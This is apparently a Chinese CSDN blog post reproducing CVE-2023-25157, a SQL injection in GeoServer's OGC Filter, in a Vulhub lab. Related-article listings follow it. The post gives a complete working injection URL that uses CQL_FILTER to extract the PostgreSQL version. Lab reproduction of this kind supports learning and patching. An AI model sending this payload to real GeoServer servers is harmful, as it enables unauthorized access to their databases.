【漏洞复现】CVE-2023-25157 GeoServer OGC Filter SQL注入漏洞

已于 2023-07-16 12:36:21 修改
阅读量925 收藏
点赞数
分类专栏: Vulhub漏洞复现 文章标签: 安全 web安全
于 2023-07-13 10:46:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53121608/article/details/131697358
版权

启动环境

 查看端口号

 访问http://your-ip:8080/geoserver即可查看到GeoServer的首页。

在利用漏洞前,需要目标服务器中存在类型是PostGIS的数据空间(datastore)和工作空间(workspace)。在Vulhub中,已经包含满足条件的工作空间,其信息如下:

  • Workspace name: vulhub
  • Data store name: pg
  • Feature type (table) name: example
  • One of attribute from feature type: name

利用这些已知参数,发送如下URL即可触发SQL注入漏洞:

http://your-ip:8080/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=vulhub:example&CQL_FILTER=strStartsWith%28name%2C%27x%27%27%29+%3D+true+and+1%3D%28SELECT+CAST+%28%28SELECT+version()%29+AS+integer%29%29+--+%27%29+%3D+true

 使用SQL注入获取到了目标服务器PostgreSQL的版本

Knight_Linker
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
GeoServer SQL注入漏洞复现CVE-2023-25157
0xSec
06-09 7008
GeoServer在预览图层的时候,可以对图层进行数据过滤从而渲染出指定位置的图层。由于未对用户输入进行过滤,在使用需要以数据库作为数据存储的功能时,攻击者可以构造畸形的过滤语法,绕过GeoServer的词法解析从而造成SQL注入,获取服务器中的敏感信息,甚至可能获取数据库服务器权限。
CVE-2023-25157GeoServer OGC Filter SQL注入漏洞复现
薛定谔嘚喵博客
09-01 1756
由于系统未对用户输入进行过滤,远程未授权攻击者可以构造特定语句绕过GeoServer的词法解析,从而实现SQL注入,成功利用此漏洞可获取敏感信息,甚至可能获取数据库服务器权限。由于GeoServer在默认配置下内置图层存放数据在文件中,则未使用外置数据库的场景不受此漏洞影响。
GeoServer漏洞CVE-2023-25157
m0_73605862的博客
12-04 984
3.然后进行模糊搜索写入,利用了布尔注入进行注入,返回结果。通过绕过前面的strStartsWith语句然后在后面查询了版本,并且变成了数字。1.了解了一下这个geoserver的请求规范,顺便了解一下这个网页的请求规范以及返回结果是什么。4.修改注入语句,不知道返回成功了没有(好奇第一条数据有这么长吗),用了另外一种也返回的这个。然乎知道漏洞是用户在输入的时候可能不规范造成的sql注入,并且这个还支持模糊查询。前半部分是sql注入一些语句的测试,后面是漏洞复现和利用。1.查看user 表。
CVE-2023-25157-main(1).zip
07-19
复现GeoServer CVE-2023-25157 SQL注入
自己动手编写SQL注入漏洞扫描工具
12-19
在CSDN上没有找到,所以将别处下载的上传过来,必须免费分享! 包括两个程序,代码尚未调试,希望有所借鉴。 代码仅供学习交流,切勿行危害安全之事,务必遵守法律法规!
vulhub漏洞复现 CVE-2016-3088
最新发布
03-14
vulhub漏洞复现 CVE-2016-3088
GeoServer 存在 sql 注入漏洞
murphysec的博客
03-01 2737
GeoServer 是一个允许用户共享和编辑地理空间数据的开源软件服务器,支持 OGC Filter expression 和 OGC Common Query Language 语言,使用 PostGIS Datastore 作为数据库。PostGIS是PostgreSQL数据库的扩展程序,增加了数据库对地理对象的支持。
GeoServer OGC Filter SQL注入漏洞CVE-2023-25157)vulhub漏洞复现
qq_53003652的博客
07-06 1491
GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现,利用 GeoServer 可以方便的发布地图数据,允许用户对特征数据进行更新、删除、插入操作。GeoServer是一款JAVA编写的、开源的、用于共享地理空间数据的软件服务器。GeoServer实现了 开放地理空间信息联盟(OGC )标准下WFS、WMS、WCS、WMTS等格式的发布。在利用漏洞前,需要目标服务器中存在类型是PostGIS的数据空间(datastore)和工作空间(workspace)。成功注入获取版本信息。
GeoServer SQL 注入漏洞复现CVE-2023-25157)附poc
网络安全爱好者,分享渗透测试、漏洞复现、src挖掘,靶场搭建知识和技巧
12-23 1325
GeoServer是OpenGIS Web 服务器规范的 J2EE 实现,利用 GeoServer 可以方便的发布地图数据,允许用户对特征数据进行更新、删除、插入操作,通过 GeoServer 可以比较容易的在用户之间迅速共享空间地理信息。在2.22.1和2.21.4之前版本中,在开放地理空间联盟(OGC)标准定义的过滤器和函数表达式中发现了一个SQL注入问题,未经身份验证的攻击者可以利用该漏洞进行SQL注入,执行恶意代码。
【1day】复现GeoServer CVE-2023-25157 SQL注入
记录并分享学习安全的知识点..
07-19 684
GeoServer是一个开源的地图服务器,它是遵循OpenGIS Web服务器规范的J2EE实现,通过它可以方便的将地图数据发布为地图服务,实现地理空间数据在用户之间的共享。由于未对用户输入进行过滤,在使用需要以数据库作为数据存储的功能时,攻击者可以构造畸形的过滤语法,绕过GeoServer的词法解析从而造成SQL注入,获取服务器中的敏感信息,甚至可能获取数据库服务器权限。 ​
Tomcat7.0+Geoserver2.14.0
10-26
使用Tomcat+Geoserver发布地图数据使用的工具包。将Geoserver解压后文件geoserver.war再次解压,然后放入Tomcat目录webapps目录下。最后运行Tomcat的bin目录下startup.bat启动Tomcat即可
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁
01-19
针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响...
Zabbix公告多个安全漏洞,涉及多个版本(附修复方案)
乐维社区的博客
01-18 1125
日前,Zabbix官方公告发现了2个安全漏洞,涉及多个版本,漏洞代号如下:高危漏洞CVE-2023-32725,一般漏洞CVE-2023-32727,据了解,高危漏洞CVE-2023-32725的CVSS评分高达9.6分。CVE-2023-32725漏洞出现在仪表板中,当用户使用带有 URL 小部件的仪表板的Scheduled reports时,将会造成zbx_session cookie 泄漏。
路漫漫远修兮-GeoServer2.16.0版本跨域解决
路漫漫远修兮
09-21 257
GeoServer在请求时发生跨域解决
学习笔记:利用GeoServer结合uDig发布WMS详细过程
weixin_30412577的博客
04-01 142
在本地已有shp格式地图数据的条件下通过Geoverser发布WMS。 环境要求:JDK, GeoServer, uDig 1.在本地拷入要发布的shp数据 在开始菜单中单击进入该文件夹 依次进入下图路径,并新建一个文件夹(如wms1),尽量用英文。并将要发布的数据拷入刚新建的wms1的文件夹内 2.登录进GeoServer地图发布页 单击Start GeoServer ...
DataEase SQL注入漏洞 (CVE-2022-34114)
weixin_68999845的博客
07-21 810
CVE-2022-34114漏洞搭建及复现
cve-2023-25157
12-08
CVE-2023-25157是一个已经被发现并公开的漏洞编号,它指的是计算机系统中的一个特定安全漏洞。根据已公开的信息,CVE-2023-25157可能存在于某个特定的软件、操作系统或网络设备中,可以被黑客利用来执行恶意代码或者获取系统权限。这种漏洞可能会对系统的安全性造成严重影响,因此需要及时进行修复和防范。 对于CVE-2023-25157的具体细节和影响,可能会因漏洞的具体情况而有所不同,建议相关厂商和组织及时查看漏洞详情,并按照公布的安全建议进行应对。在漏洞修复之前,用户也应当加强系统的安全防护措施,避免受到潜在的攻击威胁。 对于企业和个人用户来说,保持系统和软件的更新是非常重要的,因为很多漏洞都是在新版本的软件中得到修复的。同时,加强网络安全意识和技能培训也可以帮助用户更好地识别和防范各类潜在的安全威胁。 总之,CVE-2023-25157代表着一种已经被公开披露的安全漏洞,需要引起用户和厂商的高度重视,并及时进行应对和修复。同时也提醒用户在日常使用计算机和网络时要保持警惕,不轻信可疑链接和信息,以保障自身的信息和系统安全

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值